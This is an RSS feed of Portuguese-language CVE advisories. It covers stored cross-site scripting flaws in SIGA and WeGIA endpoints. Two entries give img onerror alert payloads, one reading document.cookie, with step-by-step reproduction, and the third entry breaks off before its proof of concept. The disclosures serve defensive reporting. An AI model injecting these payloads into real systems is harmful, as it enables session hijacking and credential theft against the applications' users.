<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>SIGA on CVE-Hunters</title>
    <link>https://www.cvehunters.com/pt/categories/siga/</link>
    <description>Recent content on CVE-Hunters</description>
    <atom:link href="https://www.cvehunters.com/pt/categories/siga/index.xml" rel="self" type="application/rss+xml"/>
      <item>
        <title>CVE-2026-6990</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-6990/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-6990/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-6990-cross-site-scripting-xss-armazenado-em-novo-da-função-sigawfappresponsavelnovo-parâmetro-descrição&amp;#34;&amp;gt;CVE-2026-6990: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p&amp;gt;##Resumo&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; do aplicativo SIGA. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt; é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-6990-cross-site-scripting-xss-armazenado-em-novo-da-função-sigawfappresponsavelnovo-parâmetro-descrição&amp;#34;&amp;gt;CVE-2026-6990: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p&amp;gt;##Resumo&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; do aplicativo SIGA. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt; é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(document.cookie)//&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-executar&amp;#34;&amp;gt;Passos para executar:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Registre o payload no campo &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; no endpoint &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt;.
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-6990/image.png&amp;#34;
	width=&amp;#34;924&amp;#34;
	height=&amp;#34;266&amp;#34;
	srcset=&amp;#34;/p/cve-2026-6990/image_hu_257390f57da3ef36.png 480w, /p/cve-2026-6990/image_hu_e31e27a952009eca.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;347&amp;#34;
		data-flex-basis=&amp;#34;833px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Depois disso, o XSS pode ser acionado abrindo o endpoint &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-6990/image-1.png&amp;#34;
	width=&amp;#34;478&amp;#34;
	height=&amp;#34;164&amp;#34;
	srcset=&amp;#34;/p/cve-2026-6990/image-1_hu_4ede61fcf518e8ab.png 480w, /p/cve-2026-6990/image-1_hu_6277af4afca73498.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;291&amp;#34;
		data-flex-basis=&amp;#34;699px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 25 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40282</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-40282/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-40282/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40282-cross-site-scripting-xss-armazenado-em-novo-da-função-intercorrencia_visualizarphp&amp;#34;&amp;gt;CVE-2026-40282: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso na página de notificações do Intercorrências, o qual é executado quando o usuário acessa a página, possibilitando o sequestro de sessão e a tomada de controle da conta.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não higieniza ou codifica corretamente o campo de nome de usuário, que é exibido em notificações do sistema e aceita entrada controlada pelo usuário. Um atacante pode injetar HTML ou JavaScript malicioso neste campo ao criar ou modificar um usuário.&amp;lt;/br&amp;gt;Quando uma “intercorrência” é registrada, uma notificação é gerada. Ao clicar nesta notificação, o aplicativo renderiza o nome de usuário na interface sem o devido escape, fazendo com que qualquer código injetado seja executado no navegador.&amp;lt;/br&amp;gt;Este comportamento demonstra codificação de saída inadequada, resultando em uma vulnerabilidade de XSS armazenado.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40282-cross-site-scripting-xss-armazenado-em-novo-da-função-intercorrencia_visualizarphp&amp;#34;&amp;gt;CVE-2026-40282: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso na página de notificações do Intercorrências, o qual é executado quando o usuário acessa a página, possibilitando o sequestro de sessão e a tomada de controle da conta.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não higieniza ou codifica corretamente o campo de nome de usuário, que é exibido em notificações do sistema e aceita entrada controlada pelo usuário. Um atacante pode injetar HTML ou JavaScript malicioso neste campo ao criar ou modificar um usuário.&amp;lt;/br&amp;gt;Quando uma “intercorrência” é registrada, uma notificação é gerada. Ao clicar nesta notificação, o aplicativo renderiza o nome de usuário na interface sem o devido escape, fazendo com que qualquer código injetado seja executado no navegador.&amp;lt;/br&amp;gt;Este comportamento demonstra codificação de saída inadequada, resultando em uma vulnerabilidade de XSS armazenado.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Cadastre um paciente onde o campo &amp;#34;Nome&amp;#34; ou &amp;#34;Sobrenome&amp;#34; contenha o payload.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Adicione uma entrada de &amp;#34;Intercorrência&amp;#34; para este usuário.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Navegue até a página de notificações &amp;#34;Intercorrências&amp;#34; e clique em &amp;#34;Recentes&amp;#34; e &amp;#34;Histórico&amp;#34;. Esta vulnerabilidade afeta ambas as páginas.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;4.&amp;lt;/b&amp;gt; Observe que o payload é executado no navegador:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40282/image.png&amp;#34;
	width=&amp;#34;603&amp;#34;
	height=&amp;#34;330&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40282/image_hu_dfc5bc911aa9fe3a.png 480w, /p/cve-2026-40282/image_hu_581b1a4709b48d43.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;182&amp;#34;
		data-flex-basis=&amp;#34;438px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40283</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-40283/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-40283/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40283-cross-site-scripting-xss-armazenado-em-novo-da-função-profile_pacientephp&amp;#34;&amp;gt;CVE-2026-40283: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Nome” na página “Informações Pacientes”. O código malicioso é armazenado e executado quando as informações do paciente são visualizadas.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não higieniza ou codifica corretamente o campo &amp;#34;Nome&amp;#34;, que aceita entrada controlada pelo usuário. Um invasor pode inserir HTML ou JavaScript malicioso nesse campo ao criar ou editar um paciente.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Ao acessar a página “Informações Pacientes”, esse valor é renderizado no DOM sem o devido tratamento, o que leva à execução do código injetado no navegador.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Esse comportamento indica codificação de saída inadequada e resulta em uma vulnerabilidade XSS armazenada.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40283-cross-site-scripting-xss-armazenado-em-novo-da-função-profile_pacientephp&amp;#34;&amp;gt;CVE-2026-40283: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Nome” na página “Informações Pacientes”. O código malicioso é armazenado e executado quando as informações do paciente são visualizadas.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
